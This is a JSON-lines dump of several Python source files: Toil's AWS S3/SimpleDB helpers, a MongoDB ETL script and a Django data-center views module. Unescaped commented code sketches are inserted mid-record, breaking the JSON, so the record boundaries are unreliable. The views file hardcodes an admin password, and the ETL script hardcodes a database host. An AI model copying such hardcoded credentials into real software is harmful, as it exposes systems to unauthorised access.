len(encoded) <= cls._maxEncodedSize()\n n = cls.maxValueSize\n chunks = (encoded[i:i + n] for i in range(0, len(encoded), n))\n return {cls._chunkName(i): chunk for i, chunk in enumerate(chunks)}\n\n @classmethod\n def _chunkName(cls, i):\n return str(i).zfill(3)\n\n @classmethod\n def _isValidChunkName(cls, s):\n return len(s) == 3 and s.isdigit()\n\n @classmethod\n def presenceIndicator(cls):\n \"\"\"\n The key that is guaranteed to be present in the return value of binaryToAttributes().\n Assuming that binaryToAttributes() is used with SDB's PutAttributes, the return value of\n this method could be used to detect the presence/absence of an item in SDB.\n \"\"\"\n return cls._chunkName(0)\n\n @classmethod\n def attributesToBinary(cls, attributes):\n \"\"\"\n :rtype: (str|None,int)\n :return: the binary data and the number of chunks it was composed from\n \"\"\"\n chunks = [(int(k), v) for k, v in iteritems(attributes) if cls._isValidChunkName(k)]\n chunks.sort()\n numChunks = len(chunks)\n if numChunks:\n assert len(set(k for k, v in chunks)) == chunks[-1][0] + 1 == numChunks\n serializedJob = ''.join(v for k, v in chunks)\n compressed = base64.b64decode(serializedJob)\n if compressed[0] == 'C':\n binary = bz2.decompress(compressed[1:])\n elif compressed[0] == 'U':\n binary = compressed[1:]\n else:\n assert False\n else:\n binary = None\n return binary, numChunks\n\n\nfrom boto.sdb.connection import SDBConnection\n\n\ndef fileSizeAndTime(localFilePath):\n file_stat = os.stat(localFilePath)\n file_size, file_time = file_stat.st_size, file_stat.st_mtime\n return file_size, file_time\n\n\ndef uploadFromPath(localFilePath, partSize, bucket, fileID, headers):\n \"\"\"\n Uploads a file to s3, using multipart uploading if applicable\n\n :param str localFilePath: Path of the file to 
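# A stripped-down sketch of the chunking scheme SDBHelper implements above:
# base64-encode, split into 1024-byte values, name chunks with zero-padded
# indices, and reassemble by sorted name. Constants mirror the class fields;
# this is an illustration, not the class's exact code.
import base64

MAX_VALUE_SIZE = 1024

def to_chunks(data):
    encoded = base64.b64encode(data)
    return {str(i // MAX_VALUE_SIZE).zfill(3): encoded[i:i + MAX_VALUE_SIZE]
            for i in range(0, len(encoded), MAX_VALUE_SIZE)}

def from_chunks(attrs):
    ordered = sorted(attrs.items())  # '000', '001', ... sort lexicographically
    return base64.b64decode(b''.join(v for _, v in ordered))

payload = b'x' * 3000
assert from_chunks(to_chunks(payload)) == payload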
upload to s3\n :param int partSize: max size of each part in the multipart upload, in bytes\n :param boto.s3.Bucket bucket: the s3 bucket to upload to\n :param str fileID: the name of the file to upload to\n :param headers: http headers to use when uploading - generally used for encryption purposes\n :return: version of the newly uploaded file\n \"\"\"\n file_size, file_time = fileSizeAndTime(localFilePath)\n if file_size <= partSize:\n key = bucket.new_key(key_name=fileID)\n key.name = fileID\n for attempt in retry_s3():\n with attempt:\n key.set_contents_from_filename(localFilePath, headers=headers)\n version = key.version_id\n else:\n with open(localFilePath, 'rb') as f:\n version = chunkedFileUpload(f, bucket, fileID, file_size, headers, partSize)\n for attempt in retry_s3():\n with attempt:\n key = bucket.get_key(fileID,\n headers=headers,\n version_id=version)\n assert key.size == file_size\n # Make reasonably sure that the file wasn't touched during the upload\n assert fileSizeAndTime(localFilePath) == (file_size, file_time)\n return version\n\n\ndef chunkedFileUpload(readable, bucket, fileID, file_size, headers=None, partSize=50 << 20):\n for attempt in retry_s3():\n with attempt:\n upload = bucket.initiate_multipart_upload(\n key_name=fileID,\n headers=headers)\n try:\n start = 0\n part_num = itertools.count()\n while start < file_size:\n end = min(start + partSize, file_size)\n assert readable.tell() == start\n for attempt in retry_s3():\n with attempt:\n upload.upload_part_from_file(fp=readable,\n part_num=next(part_num) + 1,\n size=end - start,\n headers=headers)\n start = end\n assert readable.tell() == file_size == start\n except:\n with panic(log=log):\n for attempt in retry_s3():\n with attempt:\n upload.cancel_upload()\n else:\n for attempt in retry_s3():\n with attempt:\n version = upload.complete_upload().version_id\n return version\n\n\ndef copyKeyMultipart(srcKey, dstBucketName, dstKeyName, partSize, headers=None):\n \"\"\"\n Copies a key from a source key to a destination key in multiple parts. Note that if the\n destination key exists it will be overwritten implicitly, and if it does not exist a new\n key will be created. 
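# The multipart helpers above walk a file in fixed-size parts with 1-based
# part numbers; a boto-free sketch of that part-range arithmetic.
def iter_parts(file_size, part_size):
    part_num, start = 0, 0
    while start < file_size:
        end = min(start + part_size, file_size)
        part_num += 1
        yield part_num, start, end   # matches upload_part_from_file's loop
        start = end

assert list(iter_parts(10, 4)) == [(1, 0, 4), (2, 4, 8), (3, 8, 10)]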
If the destination bucket does not exist an error will be raised.\n\n :param boto.s3.key.Key srcKey: The source key to be copied from.\n :param str dstBucketName: The name of the destination bucket for the copy.\n :param str dstKeyName: The name of the destination key that will be created or overwritten.\n :param int partSize: The size of each individual part, must be >= 5 MiB but large enough to\n not exceed 10k parts for the whole file\n :param dict headers: Any headers that should be passed.\n\n :rtype: boto.s3.multipart.CompletedMultiPartUpload\n :return: An object representing the completed upload.\n \"\"\"\n\n def copyPart(partIndex):\n if exceptions:\n return None\n try:\n for attempt in retry_s3():\n with attempt:\n start = partIndex * partSize\n end = min(start + partSize, totalSize)\n part = upload.copy_part_from_key(src_bucket_name=srcKey.bucket.name,\n src_key_name=srcKey.name,\n src_version_id=srcKey.version_id,\n # S3 part numbers are 1-based\n part_num=partIndex + 1,\n # S3 range intervals are closed at the end\n start=start, end=end - 1,\n headers=headers)\n except Exception as e:\n if len(exceptions) < 5:\n exceptions.append(e)\n log.error('Failed to copy part number %d:', partIndex, exc_info=True)\n else:\n log.warn('Also failed to copy part number %d due to %s.', partIndex, e)\n return None\n else:\n log.debug('Successfully copied part %d of %d.', partIndex, totalParts)\n # noinspection PyUnboundLocalVariable\n return part\n\n totalSize = srcKey.size\n totalParts = (totalSize + partSize - 1) / partSize\n exceptions = []\n # We need a location-agnostic connection to S3 so we can't use the one that we\n # normally use for interacting with the job store bucket.\n with closing(boto.connect_s3()) as s3:\n for attempt in retry_s3():\n with attempt:\n dstBucket = s3.get_bucket(dstBucketName)\n upload = dstBucket.initiate_multipart_upload(dstKeyName, headers=headers)\n log.info(\"Initiated multipart copy from 's3://%s/%s' to 's3://%s/%s'.\",\n srcKey.bucket.name, srcKey.name, dstBucketName, dstKeyName)\n try:\n # We can oversubscribe cores by at least a factor of 16 since each copy task just\n # blocks, waiting on the server. Limit # of threads to 128, since threads aren't\n # exactly free either. Lastly, we don't need more threads than we have parts.\n with ThreadPoolExecutor(max_workers=min(cpu_count() * 16, totalParts, 128)) as executor:\n parts = list(executor.map(copyPart, xrange(0, totalParts)))\n if exceptions:\n raise RuntimeError('Failed to copy at least %d part(s)' % len(exceptions))\n assert len(filter(None, parts)) == totalParts\n except:\n with panic(log=log):\n upload.cancel_upload()\n else:\n for attempt in retry_s3():\n with attempt:\n completed = upload.complete_upload()\n log.info(\"Completed copy from 's3://%s/%s' to 's3://%s/%s'.\",\n srcKey.bucket.name, srcKey.name, dstBucketName, dstKeyName)\n return completed\n\n\ndef _put_attributes_using_post(self, domain_or_name, item_name, attributes,\n replace=True, expected_value=None):\n \"\"\"\n Monkey-patched version of SDBConnection.put_attributes that uses POST instead of GET\n\n The GET version is subject to the URL length limit which kicks in before the 256 x 1024 limit\n for attribute values. 
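# A hedged sketch of the bounded thread-pool fan-out copyKeyMultipart uses
# above, with the same worker heuristic: min(16x cores, task count, 128).
from concurrent.futures import ThreadPoolExecutor
from multiprocessing import cpu_count

def fan_out(task_fn, num_tasks):
    workers = max(1, min(cpu_count() * 16, num_tasks, 128))
    with ThreadPoolExecutor(max_workers=workers) as executor:
        return list(executor.map(task_fn, range(num_tasks)))

# e.g. fan_out(copyPart, totalParts), where each task blocks on the server
print(fan_out(lambda i: i * i, 5))  # -> [0, 1, 4, 9, 16]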
Using POST prevents that.\n\n https://github.com/BD2KGenomics/toil/issues/502\n \"\"\"\n domain, domain_name = self.get_domain_and_name(domain_or_name)\n params = {'DomainName': domain_name,\n 'ItemName': item_name}\n self._build_name_value_list(params, attributes, replace)\n if expected_value:\n self._build_expected_value(params, expected_value)\n # The addition of the verb keyword argument is the only difference to put_attributes (Hannes)\n return self.get_status('PutAttributes', params, verb='POST')\n\n\ndef monkeyPatchSdbConnection(sdb):\n \"\"\"\n :type sdb: SDBConnection\n \"\"\"\n sdb.put_attributes = types.MethodType(_put_attributes_using_post, sdb)\n\n\ndefault_delays = (0, 1, 1, 4, 16, 64)\ndefault_timeout = 300\n\n\ndef connection_reset(e):\n # For some reason we get 'error: [Errno 104] Connection reset by peer' where the\n # English description suggests that errno is 54 (ECONNRESET) while the actual\n # errno is listed as 104. To be safe, we check for both:\n return isinstance(e, socket.error) and e.errno in (errno.ECONNRESET, 104)\n\n\ndef sdb_unavailable(e):\n return isinstance(e, BotoServerError) and e.status == 503\n\n\ndef no_such_sdb_domain(e):\n return (isinstance(e, SDBResponseError)\n and e.error_code\n and e.error_code.endswith('NoSuchDomain'))\n\n\ndef retryable_ssl_error(e):\n # https://github.com/BD2KGenomics/toil/issues/978\n return isinstance(e, SSLError) and e.reason == 'DECRYPTION_FAILED_OR_BAD_RECORD_MAC'\n\n\ndef retryable_sdb_errors(e):\n return (sdb_unavailable(e)\n or no_such_sdb_domain(e)\n or connection_reset(e)\n or retryable_ssl_error(e))\n\n\ndef retry_sdb(delays=default_delays, timeout=default_timeout, predicate=retryable_sdb_errors):\n return retry(delays=delays, timeout=timeout, predicate=predicate)\n\n\ndef retryable_s3_errors(e):\n return (isinstance(e, (S3CreateError, S3ResponseError))\n and e.status == 409\n and 'try again' in e.message\n or connection_reset(e)\n or isinstance(e, BotoServerError) and e.status == 500\n or isinstance(e, S3CopyError) and 'try again' in e.message)\n\n\ndef retry_s3(delays=default_delays, timeout=default_timeout, predicate=retryable_s3_errors):\n return retry(delays=delays, timeout=timeout, predicate=predicate)\n\n\ndef region_to_bucket_location(region):\n if region == 'us-east-1':\n return ''\n else:\n return region\n\n\ndef bucket_location_to_region(location):\n if location == '':\n return 'us-east-1'\n else:\n return location\n\n\ndef bucket_location_to_http_url(location):\n if location:\n return 'https://s3-' + location + '.amazonaws.com'\n else:\n return 'https://s3.amazonaws.com'\n","sub_path":"src/toil/jobStores/aws/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":16202,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"620616647","text":"import hashlib\nfrom copy import deepcopy\nfrom mysqlQueryResultsMap import resultsMap\nfrom mysqlQueries import queries\nimport recordTemplates\n\nfrom pymongo import *\nmongoCnx = MongoClient('130.85.93.85', 27017)\nmongoDb = mongoCnx[\"CMS\"]\nmongoCollection = mongoDb[\"BeneficiaryRecords\"]\n\nrecords = []\nfor beneficiary in mongoCollection.find():\n diagnoses = []\n for claims in beneficiary[\"INPATIENT_CLAIMS\"].itervalues():\n for claim in claims:\n diagnoses += claim[\"ICD9_DGNS\"]\n for claims in beneficiary[\"OUTPATIENT_CLAIMS\"].itervalues():\n for claim in claims:\n diagnoses += claim[\"ICD9_DGNS\"]\n diagnoses = list(set(diagnoses)) # deduplicate diagnoses list\n records.append({\n 
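# The retry helpers above compose small boolean predicates over exceptions;
# a minimal sketch of that style, with builtin exception types standing in
# for the boto/SSL error classes.
def connection_reset(e):
    return isinstance(e, ConnectionResetError)

def timed_out(e):
    return isinstance(e, TimeoutError)

def retryable(e):
    # same or-chain shape as retryable_sdb_errors / retryable_s3_errors
    return connection_reset(e) or timed_out(e)

assert retryable(TimeoutError())
assert not retryable(ValueError())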
\"DESYNPUF_ID\": beneficiary[\"DESYNPUF_ID\"],\n \"DiagnosesSet\": diagnoses\n })\n if len(records) == 1000: # write records in batches of 1000\n mongoDb[\"BeneficiaryDiagnosesSet\"].insert(records)\n records = []\nmongoDb[\"BeneficiaryDiagnosesSet\"].insert(records)\nrecords = []\n","sub_path":"ETL/CMS/extractBenefDiagSet.py","file_name":"extractBenefDiagSet.py","file_ext":"py","file_size_in_byte":1022,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"250109235","text":"# coding:utf-8\nimport time\nimport datetime\nimport sys\nimport os\nimport json\nimport random\nimport uuid\nimport xml.dom.minidom\nfrom xml.dom.minidom import parse, parseString\nimport xlrd\nimport xlwt\nimport pymssql\nfrom lxml import etree\nimport re\nimport pdfkit\nimport sys\nimport requests\nfrom operator import itemgetter\nimport subprocess\nimport multiprocessing\nimport decimal\nimport pymysql\nimport psutil\nimport base64\nimport win32api\nimport calendar\nimport socket\nfrom dateutil.relativedelta import relativedelta\nfrom concurrent.futures import ThreadPoolExecutor, as_completed\n\nfrom django.utils.timezone import utc\nfrom django.utils.timezone import localtime\nfrom django.shortcuts import render\nfrom django.contrib import auth\nfrom django.template import RequestContext\nfrom django.http import HttpResponseRedirect, Http404, HttpResponse, JsonResponse, FileResponse\nfrom django.http import StreamingHttpResponse\nfrom django.db.models import Q\nfrom django.db.models import Count\nfrom django.db.models import Sum, Max, Avg, Min\nfrom django.db import connection\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.views.decorators.cache import cache_page\nfrom django.utils.encoding import escape_uri_path\nfrom django.core.mail import send_mail\nfrom django.forms.models import model_to_dict\nfrom django.template.response import TemplateResponse\nfrom django.views.generic import View\nfrom django.db import transaction\n\nfrom datacenter.tasks import *\nfrom .models import *\nfrom .remote import ServerByPara\nfrom ZDDC import settings\nfrom .funcs import *\nfrom .ftp_file_handler import *\nfrom utils.handle_process import Extract, PIQuery, get_dict_name\nfrom django.shortcuts import render_to_response\n\n\ninfo = {\"webaddr\": \"cv-server\", \"port\": \"81\", \"username\": \"admin\", \"passwd\": \"Admin@2017\", \"token\": \"\",\n \"lastlogin\": 0}\n\n\n\ndef page_not_found(request):\n return render_to_response('404.html')\n\n\ndef page_error(request):\n return render_to_response('500.html')\n\n\ndef report_server(request, funid):\n if request.user.is_authenticated():\n rs = ReportServer.objects.first()\n id, report_server, user_name, password, report_file_path, web_server, ps_script_path = 0, '', '', '', '', '', ''\n if rs:\n id = rs.id\n report_server = rs.report_server\n user_name = rs.username\n password = rs.password\n report_file_path = rs.report_file_path\n web_server = rs.web_server\n ps_script_path = rs.ps_script_path\n\n return render(request, 'report_server.html',\n {'username': request.user.userinfo.fullname, \"pagefuns\": getpagefuns(funid,request),\n 'id': id, 'report_server': report_server, 'user_name': user_name,\n 'password': password, 'report_file_path': report_file_path,\n 'web_server': web_server, 'ps_script_path': ps_script_path\n })\n else:\n return HttpResponseRedirect('/login')\n\n\ndef report_server_save(request):\n if request.user.is_authenticated():\n id = request.POST.get('id', '')\n report_server = 
request.POST.get('report_server', '')\n username = request.POST.get('username', '')\n password = request.POST.get('password', '')\n report_file_path = request.POST.get('report_file_path', '')\n\n status = 0\n data = ''\n\n try:\n id = int(id)\n except:\n status = 0\n data = '网络连接异常。'\n else:\n if id == 0:\n rs = ReportServer()\n rs.report_server = report_server\n rs.username = username\n rs.password = password\n rs.report_file_path = report_file_path\n rs.save()\n status = 1\n data = '保存成功。'\n else:\n try:\n rs = ReportServer.objects.get(id=id)\n except ReportServer.DoesNotExist as e:\n status = 0\n data = '报表记录不存在。'\n else:\n rs.report_server = report_server\n rs.username = username\n rs.password = password\n rs.report_file_path = report_file_path\n rs.save()\n status = 1\n data = '保存成功。'\n return JsonResponse({\n 'status': status,\n 'data': data\n })\n else:\n return HttpResponseRedirect('/login')\n\n\ndef Digit(digit):\n \"\"\"\n 四舍五入quantize参数\n \"\"\"\n if digit == 0:\n digit = '0'\n elif digit == 1:\n digit = '0.0'\n elif digit == 2:\n digit = '0.00'\n elif digit == 3:\n digit = '0.000'\n elif digit == 4:\n digit = '0.0000'\n elif digit == 5:\n digit = '0.00000'\n elif digit == 6:\n digit = '0.000000'\n else:\n digit = '0.0000000'\n return digit\n\n\nclass DataCenter(View):\n \"\"\"\n 数据服务\n \"\"\"\n\n def get(self, request):\n # 2020-02-20\n result = {}\n target_name = request.GET.get('target_name', '')\n date = request.GET.get('date', '')\n\n if not target_name:\n return JsonResponse({\n 'status': 0,\n 'data': {},\n 'msg': '指标名称未传入。'\n })\n\n try:\n date = datetime.datetime.strptime(date, '%Y-%m-%d')\n\n # >=当天0时 <昨日0时\n end_time = date + datetime.timedelta(days=1)\n except:\n return JsonResponse({\n 'status': 0,\n 'data': {},\n 'msg': '传入时间有误。'\n })\n extract_data = getmodels('Extractdata', str(date.year)).objects.exclude(state='9').filter(datadate__gte=date,\n datadate__lt=end_time,\n target__name=target_name)\n data_list = []\n for ed in extract_data:\n data_list.append({\n 'target_name': ed.target.name,\n 'datadate': ed.datadate,\n 'curvalue': ed.curvalue,\n 'curvaluedate': ed.curvaluedate,\n 'curvaluetext': ed.curvaluetext,\n 'cumulativemonth': ed.cumulativemonth,\n 'cumulativequarter': ed.cumulativequarter,\n 'cumulativehalfyear': ed.cumulativehalfyear,\n 'cumulativeyear': ed.cumulativeyear,\n })\n result['status'] = 1\n result['data'] = data_list\n result['msg'] = '获取数据成功。'\n\n return JsonResponse(result, json_dumps_params={'ensure_ascii': False})\n\n\ndef getmodels(modelname, year):\n try:\n from django.apps import apps\n\n mydata = apps.get_model('__main__', modelname + '_' + year)\n except LookupError:\n if modelname == \"Meterdata\":\n mydata = get_meterdata_model(year)\n elif modelname == \"entrydata\":\n mydata = get_entrydata_model(year)\n elif modelname == \"Extractdata\":\n mydata = get_extractdata_model(year)\n elif modelname == \"Calculatedata\":\n mydata = get_calculatedata_model(year)\n else:\n mydata = get_entrydata_model(year)\n\n if not mydata.is_exists():\n with connection.schema_editor() as schema_editor:\n schema_editor.create_model(mydata)\n return mydata\n\n\ndef get_process_monitor_tree(request):\n if request.user.is_authenticated():\n cycle_id = request.POST.get('cycle_id', '')\n app_id = request.POST.get('app_id', '')\n source_id = request.POST.get('source_id', '')\n index = request.POST.get('index', '')\n all_process_list = []\n try:\n cycle_id = int(cycle_id)\n app_id = int(app_id)\n source_id = int(source_id)\n except ValueError as e:\n print(e)\n 
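# Digit() above builds a Decimal quantize template through a seven-branch
# if/elif chain; an equivalent sketch for the same 0-7 range, plus a usage
# example of the template with quantize.
from decimal import Decimal, ROUND_HALF_UP

def digit_template(places):
    places = max(0, min(int(places), 7))
    return '0' if places == 0 else '0.' + '0' * places

print(Decimal('3.14159').quantize(Decimal(digit_template(2)),
                                  rounding=ROUND_HALF_UP))  # -> 3.14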
targets = Target.objects.filter(operationtype__in=[16, 1]).exclude(state=9).values('source_id', 'adminapp_id',\n 'cycle_id')\n\n def does_it_exist(source, adminapp=None, cycle=None):\n if source and not any([adminapp, cycle]):\n for t in targets:\n if source == t['source_id']:\n return True\n if all([source, adminapp]) and not cycle:\n for t in targets:\n if source == t['source_id'] and adminapp == t['adminapp_id']:\n return True\n if all([source, adminapp, cycle]):\n for t in targets:\n if source == t['source_id'] and adminapp == t['adminapp_id'] and cycle == t['cycle_id']:\n return True\n return False\n\n # 进程监控 >> 数据源配置 >> (指标管理中匹配)应用>> (指标管理中心根据数据源+应用匹配)周期\n # 根节点\n root_info = dict()\n root_info['text'] = \"进程监控\"\n root_info['type'] = 'node'\n\n # 1.数据源管理\n source = Source.objects.exclude(state='9')\n app = App.objects.exclude(state='9')\n cycle = Cycle.objects.exclude(state='9')\n\n variable_info_list = []\n fixed_info_list = []\n for s in source:\n # 指标管理中匹配\n if not s.type:\n if does_it_exist(s.id):\n # 数据源类型\n source_type = \"\"\n try:\n source_type = DictList.objects.get(id=s.sourcetype).name\n except DictList.DoesNotExist as e:\n print(e)\n\n s_info = dict()\n s_info['text'] = s.name\n s_info['type'] = 'node'\n s_info['data'] = {\n 's_id': s.id,\n 's_name': s.name,\n 's_code': s.code,\n 's_type': source_type,\n 'type': 'source'\n }\n s_info['state'] = {'opened': True}\n\n # 2.应用\n a_info_list = []\n for a in app:\n if does_it_exist(s.id, a.id):\n a_info = dict()\n a_info['text'] = a.name\n a_info['type'] = 'node'\n a_info['data'] = {\n 's_id': s.id,\n 's_name': s.name,\n 's_code': s.code,\n 's_type': source_type,\n 'a_id': a.id,\n 'a_name': a.name,\n 'type': 'app'\n }\n a_info['state'] = {'opened': True}\n\n\n # 3.周期\n c_info_list = []\n\n for c in cycle:\n if does_it_exist(s.id, a.id, c.id):\n create_time, last_time, status = '', '', ''\n cp_id = ''\n # 获取进程状态\n cps = ProcessMonitor.objects.filter(source_id=s.id).filter(\n app_admin_id=a.id).filter(\n cycle_id=c.id).exclude(state='9')\n if cps.exists():\n cp = cps[0]\n cp_id = cp.id\n create_time = '{:%Y-%m-%d %H:%M:%S}'.format(\n cp.create_time) if cp.create_time else \"\"\n last_time = '{:%Y-%m-%d %H:%M:%S}'.format(cp.last_time) if cp.last_time else \"\"\n status = cp.status\n if index == \"0\":\n # 更新数据库数据:进程状态\n p_id = int(cp.p_id) if cp.p_id else \"\"\n if p_id:\n py_process = check_py_exists(p_id)\n if not py_process:\n cp.status = \"已关闭\"\n cp.save()\n status = \"已关闭\"\n\n c_info = dict()\n c_info['text'] = c.name\n c_info['type'] = 'file'\n c_info['data'] = {\n 's_id': s.id,\n 's_name': s.name,\n 's_code': s.code,\n 's_type': source_type,\n 'a_name': a.name,\n 'a_id': a.id,\n 'c_id': c.id,\n 'c_name': c.name,\n 'type': 'cycle',\n\n # 主进程id\n 'cp_id': cp_id,\n\n # 进程状态\n 'create_time': create_time,\n 'last_time': last_time,\n 'status': status\n }\n info = {'status': status, 's_id': s.id, 'a_id': a.id, 'c_id': c.id, 'check_type': ''}\n all_process_list.append(info)\n\n c_info['state'] = {'opened': True}\n if cycle_id == c.id and app_id == a.id and source_id == s.id:\n c_info['state']['selected'] = True\n\n # 判断进程状态\n if status != \"运行中\":\n c_info['type'] = 'file_grey'\n a_info['type'] = 'node_grey'\n s_info['type'] = 'node_grey'\n root_info['type'] = 'node_grey'\n c_info_list.append(c_info)\n a_info['children'] = c_info_list\n if a_info['children'] != []:\n a_info_list.append(a_info)\n if a_info_list != []:\n s_info['children'] = a_info_list\n variable_info_list.append(s_info)\n else:\n # 固定节点(数据补取、数据清理、数据服务、短信服务)\n 
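# does_it_exist above rescans the targets list for every tree node; a common
# alternative, sketched here, precomputes three membership sets once so each
# lookup is O(1). Field names follow the values() call above.
def build_membership(targets):
    by_source, by_app, by_cycle = set(), set(), set()
    for t in targets:
        by_source.add(t['source_id'])
        by_app.add((t['source_id'], t['adminapp_id']))
        by_cycle.add((t['source_id'], t['adminapp_id'], t['cycle_id']))
    return by_source, by_app, by_cycle

targets = [{'source_id': 1, 'adminapp_id': 2, 'cycle_id': 3}]
by_source, by_app, by_cycle = build_membership(targets)
print(1 in by_source, (1, 2) in by_app, (1, 2, 3) in by_cycle)  # True True True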
fixed_s_info = dict()\n fixed_s_info['text'] = s.name\n fixed_s_info['type'] = 'file'\n\n # 进程状态\n f_create_time, f_last_time, f_status = '', '', ''\n # 获取进程状态\n f_cps = ProcessMonitor.objects.filter(source_id=s.id).exclude(state='9')\n if f_cps.exists():\n f_cp = f_cps[0]\n f_create_time = '{:%Y-%m-%d %H:%M:%S}'.format(\n f_cp.create_time) if f_cp.create_time else \"\"\n f_last_time = '{:%Y-%m-%d %H:%M:%S}'.format(f_cp.last_time) if f_cp.last_time else \"\"\n f_status = f_cp.status\n if index == \"0\":\n # 更新数据库数据:进程状态\n p_id = int(f_cp.p_id) if f_cp.p_id else \"\"\n if p_id:\n py_process = check_py_exists(p_id)\n if not py_process:\n f_cp.status = \"已关闭\"\n f_cp.save()\n f_status = \"已关闭\"\n\n # 判断进程状态\n if f_status != \"运行中\":\n fixed_s_info['type'] = 'file_grey'\n root_info['type'] = 'node_grey'\n\n fixed_s_info['data'] = {\n 'check_type': s.type,\n\n 'f_s_name': s.name,\n 's_id': s.id,\n # 进程状态\n 'create_time': f_create_time,\n 'last_time': f_last_time,\n 'status': f_status\n }\n info = {'status': f_status, 's_id': s.id, 'check_type': s.type}\n all_process_list.append(info)\n fixed_info_list.append(fixed_s_info)\n\n # 固定进程放在后面\n variable_info_list.extend(fixed_info_list)\n root_info['children'] = variable_info_list\n root_info['state'] = {'opened': True}\n root_info['data'] = {\n 'type': 'root'\n }\n\n tree_data = json.dumps([root_info], ensure_ascii=False)\n return JsonResponse({\n \"ret\": 1,\n \"data\": tree_data,\n \"all_process_list\": all_process_list\n })\n else:\n return HttpResponseRedirect(\"/login\")\n\n\ndef check_py_exists(pid):\n process = None\n try:\n pid = int(pid)\n if psutil.pid_exists(pid):\n process = psutil.Process(pid=pid)\n if 'python.exe' not in process.name():\n process = None\n except:\n pass\n\n return process\n\n\ndef process_monitor_index(request, funid):\n \"\"\"\n 进程监控\n \"\"\"\n if request.user.is_authenticated():\n # 检测进程是否启动\n process_monitors = ProcessMonitor.objects.exclude(state='9')\n\n shutdown_process_set = set()\n for process_monitor in process_monitors:\n p_id = process_monitor.p_id\n try:\n p_id = int(p_id)\n except ValueError as e:\n shutdown_process_set.add(process_monitor.id)\n else:\n py_process = check_py_exists(p_id)\n if not py_process:\n shutdown_process_set.add(process_monitor.id)\n if shutdown_process_set:\n process_monitors.filter(id__in=shutdown_process_set).update(**{\n 'status': '已关闭', 'create_time': None, 'p_id': ''\n })\n return render(request, 'process_monitor.html',\n {'username': request.user.userinfo.fullname,\n \"pagefuns\": getpagefuns(funid,request)})\n else:\n return HttpResponseRedirect(\"/login\")\n\n\ndef process_monitor_data(request):\n if request.user.is_authenticated():\n result = []\n p_source = Source.objects.filter(pnode=None).exclude(state=\"9\").filter(type='')\n if p_source.exists():\n p_source = p_source[0]\n else:\n return JsonResponse({\"data\": []})\n all_source = Source.objects.exclude(state=\"9\").filter(pnode=p_source).filter(type='')\n for source in all_source:\n source_type = source.sourcetype\n if source_type:\n source_type = int(source_type)\n try:\n temp_dict_list = DictList.objects.exclude(state=\"9\").get(id=source_type)\n source_type_list = get_select_source_type(temp_source_type=source_type)\n\n result.append({\n \"id\": source.id,\n \"name\": source.name,\n \"code\": source.code,\n \"sourcetype\": source_type,\n \"sourcetype_name\": temp_dict_list.name,\n \"source_type_list\": source_type_list,\n \"create_time\": source.create_time.strftime(\n '%Y-%m-%d %H:%M:%S') if source.create_time 
else \"未启动\",\n \"last_time\": source.last_time.strftime(\n '%Y-%m-%d %H:%M:%S') if source.last_time else \"未启动\",\n \"status\": source.status if source.status else \"\",\n })\n except Exception as e:\n print(e)\n\n return JsonResponse({\"data\": result})\n\n\ndef handle_process(current_process, handle_type=None):\n \"\"\"\n 操作程序\n 已关闭\n 运行中\n \"\"\"\n tag, res = \"\", \"\"\n\n if handle_type == \"RUN\":\n try:\n process_path = BASE_DIR + os.sep + \"utils\" + os.sep + \"handle_process.py\" + \" {0}\".format(\n current_process.id)\n\n # 启动前,清理当前未关闭的进程,避免同ID的进程在取数\n python_process = [p for p in psutil.process_iter() if 'python' in p.name()]\n\n for pp in python_process:\n try:\n # ['C:\\\\Python35\\\\python.exe', '-i', 'D:\\\\Pros\\\\ZDDC\\\\utils\\\\handle_process.py', '14']\n if 'handle_process.py' in pp.as_dict()['cmdline'][2] and current_process.id == int(\n pp.as_dict()['cmdline'][3]):\n pp.terminate()\n except:\n pass\n\n win32api.ShellExecute(0, 'open', 'python', r'-i {process_path}'.format(process_path=process_path), '', 0)\n res = \"程序启动成功。\"\n tag = 1\n except Exception as e:\n print(e)\n res = \"程序启动失败\"\n if tag == 1:\n # 修改数据库进程状态\n current_process.status = \"运行中\"\n current_process.create_time = datetime.datetime.now()\n current_process.save()\n elif handle_type == \"DESTROY\":\n pid = current_process.p_id\n if pid:\n py_process = check_py_exists(pid)\n if py_process:\n py_process.terminate()\n\n # 修改数据库进程状态\n current_process.status = \"已关闭\"\n current_process.create_time = None\n current_process.p_id = \"\"\n current_process.save()\n res = \"程序终止成功。\"\n tag = 1\n else:\n res = \"未找到该进程\"\n else:\n res = \"该进程不存在。\"\n else:\n res = \"程序执行类型不符合。\"\n\n return (tag, res)\n\n\ndef process_run(request):\n if request.user.is_authenticated():\n tag, res = 0, \"\"\n\n source_id = request.POST.get(\"source_id\", \"\")\n app_id = request.POST.get(\"app_id\", \"\")\n cycle_id = request.POST.get(\"cycle_id\", \"\")\n operate = request.POST.get(\"operate\", \"\")\n check_type = request.POST.get(\"check_type\", \"\")\n try:\n source_id = int(source_id)\n app_id = int(app_id)\n cycle_id = int(cycle_id)\n except ValueError as e:\n print(e)\n\n # 进程操作记入日志\n def record_log(app_id, source_id, cycle_id, msg):\n try:\n log = LogInfo()\n log.source_id = source_id\n log.app_id = app_id\n log.cycle_id = cycle_id\n log.create_time = datetime.datetime.now()\n log.content = msg\n log.save()\n except:\n pass\n\n # 固定进程\n current_process = ProcessMonitor.objects.filter(source_id=source_id).exclude(state='9')\n\n # 动态进程\n if not check_type:\n current_process = ProcessMonitor.objects.filter(source_id=source_id).filter(app_admin_id=app_id).filter(\n cycle_id=cycle_id).exclude(state='9')\n\n if current_process.exists():\n current_process = current_process[0]\n\n def get_running_info(current_process):\n # 获取运行状态与启动时间\n status = current_process.status\n create_time = current_process.create_time\n return {\n 'status': status,\n 'create_time': '{:%Y-%m-%d %H:%M:%S}'.format(create_time) if create_time else ''\n }\n\n if operate == 'start':\n # 查看是否运行中\n if current_process.status == \"运行中\":\n tag = 0\n res = \"请勿重复执行该程序。\"\n else:\n tag, res = handle_process(current_process, handle_type=\"RUN\")\n record_log(app_id, source_id, cycle_id, '进程启动成功。')\n elif operate == 'stop':\n if current_process.status != \"运行中\":\n tag = 0\n res = \"当前进程未在运行中。\"\n else:\n tag, res = handle_process(current_process, handle_type=\"DESTROY\")\n record_log(app_id, source_id, cycle_id, '进程关闭成功。')\n elif operate == 'restart':\n if 
